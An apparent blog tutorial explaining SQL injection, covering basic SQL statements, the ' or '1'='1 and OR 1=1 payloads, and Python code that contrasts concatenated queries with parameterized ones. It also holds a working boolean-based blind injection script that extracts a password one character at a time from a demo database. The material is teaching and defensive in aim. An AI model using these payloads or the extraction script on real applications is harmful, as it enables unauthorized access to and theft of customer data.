SQL injections 💉- Injecting to hacking

Yashwant Singh 🐧
Published in System Weakness
5 min read · Jan 10, 2023


SQL stands for Structured Query Language.

SQL injection, commonly abbreviated SQLi, is an attack on a web application's database in which attacker-controlled input becomes part of a SQL statement, so that the attacker's own queries or commands are executed by the database server.


When a web application builds a database query from user input that hasn't been properly validated, an attacker may be able to steal, delete or alter private and customer data, and may also be able to bypass the application's authentication to reach private or customer-only areas.

SQLi is one of the oldest web application vulnerabilities and is still routinely exploited. It is well known enough that injection has a permanent place on the OWASP Top Ten list (Injection is A03 in the 2021 edition).

What is a database?

A database is a way of storing collections of data in an organized manner electronically.

Databases are managed by a DBMS (Database Management System). DBMSs fall into two camps, relational and non-relational; SQL, and therefore SQLi, concerns the relational kind. Within a DBMS you can have multiple databases, each containing its own set of related data.

For example, you may have a database called “shop”. Within this database, you want to store information about products available to purchase, users who have signed up to your online shop, and information about the orders you’ve received. You’d store each kind of information separately in the database using tables, each identified by a unique name. You can see this structure in the diagram below, which also shows how a business might keep other separate databases for staff information or for the accounts team.

What is SQLi?

SQL is a feature-rich language used for querying and manipulating databases; the individual queries are more properly referred to as statements.

The simplest statements, which we’ll cover in this article, are used to select, update, insert and delete data. Some database servers have their own dialects, so small changes to the syntax may be needed to get a statement working on a particular server. Because SQL injection is so well known, these dialect-specific variants are easy to find on the web.

SELECT

1. The SELECT query is used to retrieve data from the database. The asterisk returns every column of every row in the users table.

select * from users;

2. We can instead name only the columns we need; this returns just the username and password columns for every row.

select username,password from users;

3. A WHERE clause restricts the result to matching rows. This will only return the rows where the username is admin.

select * from users where username='admin';

4. This will only return the rows where the username is NOT equal to admin.

select * from users where username != 'admin';

5. This returns the rows where the username is equal to admin AND the password is equal to p4ssword. A login form that runs a query like this, built from the submitted username and password, is the classic SQLi target.

select * from users where username='admin' and password='p4ssword';

Furthermore, I won’t spend more time on further queries here; you can find them all at the link below.

INSERT

It inserts a new row of data into the table. The column list in parentheses names the columns we are supplying data for, and the values (...) clause supplies the data for those columns, in the same order.

insert into users (username,password) values ('bob','password123');

UPDATE

It updates one or more existing rows in a table. The SET clause gives the new values and the WHERE clause selects which rows are changed; without a WHERE clause, every row in the table is updated.

update users SET username='root',password='pass123' where username='admin';

DELETE

The DELETE statement tells the database we wish to remove one or more rows of data. As with UPDATE, the WHERE clause selects the rows; omitting it deletes every row in the table.

delete from users where username='martin';

SQL Injection Example

An attacker who wishes to perform SQL injection manipulates a standard SQL query by supplying input that the application inserts into the query without validating it. The first step, before any manipulation, is to find an input field or request parameter whose value ends up inside a SQL statement; only then can the attacker begin manipulating the query.

For example, suppose a product page runs SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = 999, with the 999 taken straight from the URL. Submitting 999 OR 1=1 as the item number turns the query into:

SELECT ItemName, ItemDescription
FROM Items
WHERE ItemNumber = 999 OR 1=1

Because 1=1 is always true, the WHERE clause now matches every row, and the page returns every item in the table rather than the one that was requested. Note that no quote character is needed here: the value sits in a numeric context, so the payload is plain text appended to the number.

Types of SQL injection attacks

1. In-Band Injection via Unsanitized Input

Unsanitized input is the root cause of every SQLi attack: the attacker provides user input that isn’t sanitized for characters that should be escaped (such as the single quote), and/or isn’t validated to be of the type that is expected. In the classic in-band form shown here, the results of the manipulated query come straight back in the application’s normal response.

For example, a website used to pay bills online might request the user’s account number in a web form and then send that to the database to pull up the associated account information. If the web application is building a SQL query string dynamically with the account number the user provided, it might look something like this:

"SELECT * FROM customers WHERE account = '" + userProvidedAccountNumber +"';"

While this works for users who properly enter their account number, it leaves the door open for attackers. For example, if someone supplied an account number of ' or '1' = '1, the resulting query string would be:

"SELECT * FROM customers WHERE account = '' or '1' = '1';"

Because '1' = '1' always evaluates to TRUE, the WHERE clause matches every row, and sending this statement to the database returns the data for all customers instead of a single customer. The fix is not to escape more characters by hand but to keep data out of the statement text entirely: use parameterized (prepared) queries, so the account number is bound as a value rather than spliced into SQL, and validate the type of numeric inputs before they go anywhere near a query.
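To make both examples above concrete (the unquoted ItemNumber = 999 OR 1=1 lookup and the quoted account-number lookup), here is an added Python example, not code from the article, that builds each vulnerable query by string concatenation against a constructed in-memory SQLite database and places the parameterized equivalents beside them. The table contents, column names and function names are assumptions chosen for illustration.

```python
# Added example (not from the article): the vulnerable, concatenated lookups
# from the text next to their parameterized equivalents, run against a
# constructed in-memory SQLite database.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a billing 'customers' table and a product 'Items' table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE customers (account TEXT, name TEXT, balance REAL);
        INSERT INTO customers VALUES ('1001', 'alice', 12.50);
        INSERT INTO customers VALUES ('1002', 'bob', 99.00);
        INSERT INTO customers VALUES ('1003', 'carol', 0.00);
        CREATE TABLE Items (ItemNumber INTEGER, ItemName TEXT, ItemDescription TEXT);
        INSERT INTO Items VALUES (999, 'widget', 'a small widget');
        INSERT INTO Items VALUES (1000, 'gadget', 'a larger gadget');
        INSERT INTO Items VALUES (1001, 'prototype', 'not yet public');
        """
    )
    return conn


def lookup_customer_vulnerable(conn, user_account: str) -> list:
    # The article's pattern: the raw input is pasted into the SQL text.
    query = "SELECT * FROM customers WHERE account = '" + user_account + "';"
    return conn.execute(query).fetchall()


def lookup_item_vulnerable(conn, user_item_number: str) -> list:
    # Numeric context: the value is not quoted, so the payload needs no quote either.
    query = "SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = " + user_item_number
    return conn.execute(query).fetchall()


def lookup_customer_safe(conn, user_account: str) -> list:
    # Parameterized query: the driver passes the value separately from the
    # statement, so quotes and keywords in the input are treated as data.
    return conn.execute(
        "SELECT * FROM customers WHERE account = ?", (user_account,)
    ).fetchall()


def item_number_is_valid(user_item_number: str) -> bool:
    """Type check: an item number must be a plain decimal integer."""
    return user_item_number.strip().isdigit()


def lookup_item_safe(conn, user_item_number: str) -> list:
    # Validate the type first, then bind the integer as a parameter.
    if not item_number_is_valid(user_item_number):
        raise ValueError("item number must be an integer: %r" % user_item_number)
    return conn.execute(
        "SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = ?",
        (int(user_item_number),),
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(lookup_customer_vulnerable(conn, "1001"))            # one row
    print(lookup_customer_vulnerable(conn, "' or '1' = '1"))   # every customer
    print(lookup_item_vulnerable(conn, "999 OR 1=1"))          # every item, including the unreleased one
    print(lookup_customer_safe(conn, "' or '1' = '1"))         # [] : no account has that literal value
    try:
        lookup_item_safe(conn, "999 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

Run it and compare the two halves: the vulnerable lookups return every customer and every item for the payloads, while the safe versions return nothing for the quoted payload (it is searched for as a literal account number) and reject the numeric one before it ever reaches the database.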

2. Blind SQL Injection

It is also referred to as inferential SQL injection.

A blind SQL injection attack doesn’t reveal data directly in the response from the targeted application. Instead, the attacker infers information from indirect clues in its behaviour: differences in the details of HTTP responses, a blank page for certain input (boolean-based), or how long the database takes to respond to certain input (time-based, typically by injecting a deliberate delay). Each observation leaks only a true/false answer, so data is usually extracted one character at a time over many requests. These clues may also point to another SQLi avenue for the attacker to try.
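The boolean-based form of this, as an added Python example that is not the article’s code: a constructed, deliberately vulnerable lookup that reveals only whether a username exists, and an attacker routine that recovers the admin password from that single bit per request using SQLite’s length() and substr() functions. The table, the secret value, the character set and the function names are assumptions for illustration; real targets differ in dialect (for example SUBSTRING on other servers), and the time-based variant replaces the boolean condition with a deliberate delay.

```python
# Added example (not from the article): boolean-based blind SQL injection
# against a constructed, deliberately vulnerable lookup. The attacker never
# sees the password in a response; it is rebuilt from a yes/no signal.
import sqlite3
import string

SECRET_PASSWORD = "p4ssword"  # constructed value the attacker will recover


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET_PASSWORD,))
    conn.execute("INSERT INTO users VALUES ('bob', 'password123')")
    return conn


def user_exists(conn, username: str) -> bool:
    """Simulated vulnerable endpoint: concatenates the input and reveals only
    whether any row matched (think of a page that renders, or comes back blank)."""
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchone() is not None


# Guess alphabet; the single quote is deliberately absent so payloads stay well-formed.
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*_-"


def blind_extract_password(oracle, target_user: str, max_len: int = 64) -> str:
    """Recover target_user's password using only oracle(payload) -> True/False.

    Each payload closes the username literal with a quote, appends a condition
    on the password column, and leaves the application's own closing quote to
    terminate the final string literal."""
    # Step 1: learn the length with conditions on length().
    length = None
    for n in range(1, max_len + 1):
        if oracle(f"{target_user}' AND length(password) = {n} AND '1'='1"):
            length = n
            break
    if length is None:
        raise RuntimeError("could not determine password length")

    # Step 2: recover each position with substr() comparisons (one bit per request).
    recovered = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(f"{target_user}' AND substr(password, {pos}, 1) = '{ch}"):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character in CHARSET matched position {pos}")
    return recovered


def run_attack() -> tuple:
    """Drive the attack against the constructed database and count oracle calls."""
    conn = make_db()
    calls = {"n": 0}

    def oracle(payload: str) -> bool:
        calls["n"] += 1
        return user_exists(conn, payload)

    return blind_extract_password(oracle, "admin"), calls["n"]


if __name__ == "__main__":
    password, requests = run_attack()
    print(f"recovered {password!r} in {requests} requests")
```

The request counter is the point to notice: a few hundred requests recover an eight-character value, which is why blind injection shows up in logs as a burst of near-identical requests differing only in a number or a single character, and why a request-rate or anomaly detection on such parameters is a useful compensating control.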

3. Out-of-Band Injection

This attack is more complex and is used when the attacker cannot achieve their goal in a single, direct query-response exchange, for example because query results are never shown and timing signals are unreliable. The attacker crafts SQL statements that make the database server itself open a connection to an external server the attacker controls, typically over DNS or HTTP using the server’s own networking features, and the data to be exfiltrated is carried in that outbound request. It only works when the database host is allowed to make such connections, which is one reason to restrict outbound traffic from database servers.

If you want to learn more about SQL injection, I would also recommend the OWASP page on it. It contains various examples and modules.

Here is another great resource for learning SQLi. It’s from an engineering perspective.

SQL injection cannot be learnt only by reading articles, though; you’ll have to practise these queries and this syntax hands-on. So I would highly suggest doing some CTF (Capture the Flag) challenges and deliberately vulnerable practice labs, so that you understand it better.

Be safe, be secure, and happy hacking :)
